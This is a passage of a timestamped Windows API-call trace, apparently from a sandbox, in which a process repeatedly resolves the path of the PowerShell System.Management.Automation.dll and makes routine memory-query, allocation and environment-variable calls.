	[0418.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.605] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0419.610] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0419.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.610] CoTaskMemFree (pv=0x1ed820) 
	[0419.614] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0419.621] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0419.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.621] CoTaskMemFree (pv=0x1ed820) 
	[0419.622] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0419.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.622] CoTaskMemFree (pv=0x1ed820) 
	[0419.622] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0419.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.622] CoTaskMemFree (pv=0x1ed820) 
	[0420.595] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0420.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.595] CoTaskMemFree (pv=0x1ed820) 
	[0420.600] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0420.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.600] CoTaskMemFree (pv=0x1ed820) 
	[0420.602] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0420.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.602] CoTaskMemFree (pv=0x1ed820) 
	[0420.607] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0420.609] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0421.569] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0422.326] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0422.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0422.326] CoTaskMemFree (pv=0x1ed820) 
	[0422.986] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1edc60
	[0422.987] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1edd70
	[0424.383] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.742] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.120] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.120] VirtualQuery (in: lpAddress=0xca160, lpBuffer=0xcb020, dwLength=0x30 | out: lpBuffer=0xcb020*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.146] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.147] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.148] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
